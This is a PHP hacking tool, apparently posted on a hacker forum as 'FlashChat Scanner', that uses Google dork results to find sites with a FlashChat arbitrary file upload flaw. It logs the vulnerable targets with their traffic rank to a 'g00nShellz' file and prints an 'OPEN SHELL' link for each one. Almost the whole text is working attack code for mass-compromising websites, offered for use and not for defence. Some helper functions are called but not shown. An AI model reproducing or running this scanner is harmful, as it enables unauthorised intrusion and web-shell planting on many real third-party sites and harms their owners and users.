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Locked FlashChat Tool [Scan+AutoUpload]


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FlashChat Scanner

[For FlashChat Arbitrary File Upload Vuln]
Note: the bug was found by somebody else

Google Dork: <?php if(isset($_POST['dork']{0})) { $file = fopen("g00nShellz.txt","a"); echo '
Scanning has been started... Good luck! ;)

'; letItBy(); for($googlePage = 1; $googlePage <= 50; $googlePage++) { $googleResult = google_that($_POST['dork'], $googlePage); if(!$googleResult) { echo 'Finished scanning.'; fclose($file); break; } for($victim = 0; $victim < sizeof($googleResult); $victim++){ $result = check_vuln($googleResult[$victim]['unescapedUrl']); $alexa = getAlexa($googleResult[$victim]['unescapedUrl']); echo "Currently checking..."; if($result != "Fail!"){ $line = $result . " | " . $alexa . "\n"; fwrite($file,$line); echo ''; echo "SITE: {$googleResult[$victim]['unescapedUrl']} - VULNERABLE\n"; echo "
OPEN SHELL"; echo " - Alexa Rank = " . $alexa . "

"; } else { echo ''; echo "{$googleResult[$victim]['titleNoFormatting']} - NOT VULNERABLE"; if($alexa <= 50000) echo " - " . $alexa; echo "\n
"; } letItBy(); } } echo '
'; }?>

Coded by g00n.
Greets: Xploiter.net
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